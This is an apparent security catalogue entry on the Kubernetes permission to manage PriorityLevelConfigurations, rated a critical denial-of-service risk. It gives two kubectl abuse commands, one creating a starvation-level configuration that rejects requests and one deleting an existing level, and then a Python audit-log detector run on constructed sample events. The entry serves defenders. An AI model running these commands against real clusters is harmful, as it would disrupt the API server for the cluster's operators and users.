Manage PriorityLevelConfigurations (API Server DoS/Manipulation)
Denial of Service
Critical
Overview
| Field | Value |
|---|---|
| ID | 1099 |
| Name | Manage PriorityLevelConfigurations (API Server DoS/Manipulation) |
| Risk Category | Denial of Service |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | flowcontrol.apiserver.k8s.io |
| Resources | prioritylevelconfigurations |
| Verbs | create, update, patch, delete |
| Tags | APIServerDoS, ControlPlaneDisruption, DenialOfService, Tampering |
Description
Allows managing PriorityLevelConfiguration objects cluster-wide. These objects are part of API Priority and Fairness (APF), which defines the concurrency limits and queueing behaviour applied to API server requests. Misconfiguring them can cause a denial of service against the API server, either by starving critical requests of concurrency or by setting unfair limits, which impacts cluster stability.
Abuse Scenarios
- Create a new PriorityLevelConfiguration with extremely low concurrency limits (DoS).
kubectl create -f - <<EOF
apiVersion: flowcontrol.apiserver.k8s.io/v1beta2
kind: PriorityLevelConfiguration
metadata:
  name: starve-api
spec:
  type: Limited
  limited:
    assuredConcurrencyShares: 1
    limitResponse:
      type: Reject
EOF
- Delete an existing PriorityLevelConfiguration, disrupting API server stability.
kubectl delete prioritylevelconfiguration <prioritylevelconfiguration-name>
# Example: kubectl delete prioritylevelconfiguration system-leader-election
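A defender-side detection for both scenarios above, added here as an example and not part of this catalogue entry. It scans Kubernetes audit log output (one JSON event per line) for write verbs on prioritylevelconfigurations and annotates the two patterns described: a newly created level with very low shares and a Reject limit response, and deletion of an existing level. The sample events, the `LOW_SHARES` threshold and the `make_event` helper are constructed assumptions, and the `requestObject` inspection assumes the audit policy records this resource at RequestResponse level.

```python
import json
from typing import Iterable, Optional

WRITE_VERBS = {"create", "update", "patch", "delete"}
LOW_SHARES = 5  # assumed alert threshold; tune to the share values your real levels use
APF_GROUP, APF_RESOURCE = "flowcontrol.apiserver.k8s.io", "prioritylevelconfigurations"

def classify_event(event: dict) -> Optional[dict]:
    ref = event.get("objectRef") or {}
    verb = event.get("verb")
    if verb not in WRITE_VERBS or (ref.get("apiGroup"), ref.get("resource")) != (APF_GROUP, APF_RESOURCE):
        return None  # reads, and writes to anything else, are out of scope here
    user = (event.get("user") or {}).get("username", "<unknown>")
    name = ref.get("name", "?")
    reasons = [f"{verb} on PriorityLevelConfiguration {name} by {user}"]
    # requestObject is only recorded when the audit policy logs this resource at RequestResponse level
    spec = (event.get("requestObject") or {}).get("spec") or {}
    limited = spec.get("limited") or {}
    shares = limited.get("assuredConcurrencyShares", limited.get("nominalConcurrencyShares"))
    if spec.get("type") == "Limited" and shares is not None and shares <= LOW_SHARES:
        reasons.append(f"very low concurrency shares ({shares})")
    if (limited.get("limitResponse") or {}).get("type") == "Reject":
        reasons.append("limitResponse Reject: excess requests are dropped rather than queued")
    if verb == "delete":
        reasons.append("deleting a level leaves every FlowSchema that references it dangling")
    return {"user": user, "verb": verb, "name": name, "reasons": reasons}

def scan(lines: Iterable[str]) -> list:
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or malformed line
        if (finding := classify_event(event)) is not None:
            findings.append(finding)
    return findings

def make_event(verb, user, name, request_object=None):  # builds one constructed audit event
    return json.dumps({"kind": "Event", "verb": verb, "user": {"username": user},
                       "objectRef": {"apiGroup": APF_GROUP, "resource": APF_RESOURCE, "name": name},
                       **({"requestObject": request_object} if request_object else {})})
# Constructed sample events, not captured from any real cluster
SAMPLE_AUDIT = "\n".join([
    make_event("create", "system:serviceaccount:dev:ci-bot", "starve-api",
               {"spec": {"type": "Limited", "limited": {"assuredConcurrencyShares": 1,
                                                        "limitResponse": {"type": "Reject"}}}}),
    make_event("get", "system:kube-scheduler", "leader-election"),
    make_event("delete", "alice", "leader-election"),
])
```

Running `scan(SAMPLE_AUDIT.splitlines())` yields two findings (the create and the delete) and ignores the read; in practice feed it the audit webhook or log-backend output and route findings to your alerting pipeline.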